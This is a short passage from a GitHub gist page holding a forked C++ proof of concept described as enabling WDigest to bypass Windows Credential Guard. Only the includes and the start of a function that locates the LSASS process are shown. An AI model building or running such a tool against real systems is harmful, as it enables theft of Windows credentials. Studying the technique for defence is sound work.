Skip to content

Instantly share code, notes, and snippets.

View ArtificialAmateur's full-sized avatar

Artificial ArtificialAmateur

View GitHub Profile
@ArtificialAmateur
ArtificialAmateur / CredGuard_PoC
Created August 27, 2020 04:44 — forked from N4kedTurtle/CredGuard_PoC
PoC for enabling wdigest to bypass credential guard
#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <iostream>
DWORD GetLsassPid() {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);